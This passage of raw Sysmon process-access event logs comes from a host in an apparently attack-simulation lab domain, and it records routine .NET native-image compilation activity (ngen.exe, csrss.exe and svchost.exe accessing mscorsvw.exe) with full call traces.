\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8021,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.184\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-0010F8981200}\r\nTargetProcessId: 3772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.184","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-0010F8981200}","TargetProcessId":"3772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8022,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-0010F8981200}\r\nTargetProcessId: 3772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-0010F8981200}","TargetProcessId":"3772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8023,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.215\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D7-5F25-0000-001039611100}\r\nTargetProcessId: 2208\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.215","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D7-5F25-0000-001039611100}","TargetProcessId":"2208","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8024,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.215\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D7-5F25-0000-001039611100}\r\nTargetProcessId: 2208\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.215","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D7-5F25-0000-001039611100}","TargetProcessId":"2208","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8025,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.231\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-0010469C1200}\r\nTargetProcessId: 2208\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.231","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-0010469C1200}","TargetProcessId":"2208","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8026,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.262\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-0010E49F1200}\r\nTargetProcessId: 3236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.262","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-0010E49F1200}","TargetProcessId":"3236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8027,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.262\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-0010E49F1200}\r\nTargetProcessId: 3236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.262","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-0010E49F1200}","TargetProcessId":"3236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8028,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.278\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-0010E49F1200}\r\nTargetProcessId: 3236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.278","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-0010E49F1200}","TargetProcessId":"3236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
